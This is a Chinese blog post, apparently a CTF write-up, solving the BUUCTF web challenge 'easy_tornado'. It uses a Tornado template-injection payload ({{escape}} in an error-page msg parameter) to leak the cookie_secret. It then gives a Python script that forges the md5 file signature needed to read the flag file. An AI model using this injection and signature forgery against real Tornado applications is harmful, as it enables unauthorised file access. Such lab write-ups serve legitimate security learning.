码迷,mamicode.com
首页 > Web开发 > 详细

Buuctf-------WEB之easy_tornado

时间:2019-09-23 18:32:31      阅读:147      评论:0      收藏:0      [点我收藏+]

标签:关键字   turn   request   tor   hint   ref   class   escape   update   

1.给了三个提示

 技术图片

 

 

技术图片

flag在/fllllllllllllag这里

技术图片

 

Render+tornado这两个东西,显然是python web

技术图片

 

 根据提示flag所在文件夹,加上路径去访问,发现无法访问,被跳转到一个错误页面

 技术图片

 

 到这里,开始怀疑可能是不是存在模板注入

输入的数据都被当作代码执行了,举个例子,{{1+1}}回显会返回2,当然,正常情况很少这样。一般是某个函数或者关键字会被执行

先试试看

翻了一下官网,大概这些函数

 技术图片

 

 挨个试试

第一个escape就被直接执行了

http://9cc83977-4b02-44c3-93d1-b1f6d026f845.node1.buuoj.cn/error?msg={{escape}}

 技术图片

这里根据提示,我们需要的是cookie

技术图片

 

 

 参考wp,师傅们这样解释的

技术图片

 

 接下来根据hint提示计算hash

#!-*-coding:utf-8 -*-
import hashlib
def md5(s):
    md5 = hashlib.md5()
    md5.update(s)
    return md5.hexdigest()
def filehash():
    filename = ‘/fllllllllllllag‘
    cookie_secret = ‘01d3ae36-9d9e-44f4-b25e-405eda25b369‘
    print(md5(cookie_secret + md5(filename)))
if __name__ == ‘__main__‘:
    filehash()

 742267cca0cd702fac6bbaeb947cd61e带进去访问,出flag

 技术图片

 

 Flag:  flag{94b1f826-b51b-4822-986f-bc718c19560b}

参考文章:

http://ch.vksec.com/2017/06/tornado.html

https://blog.csdn.net/weixin_44677409/article/details/94410580

https://tornado.readthedocs.io/en/latest/web.html#tornado.web.RequestHandler

https://www.kancloud.cn/kancloud/python-basic/41712

https://www.cnblogs.com/cimuhuashuimu/p/11544455.html

Buuctf-------WEB之easy_tornado

标签:关键字   turn   request   tor   hint   ref   class   escape   update   

原文地址:https://www.cnblogs.com/mke2fs/p/11573786.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!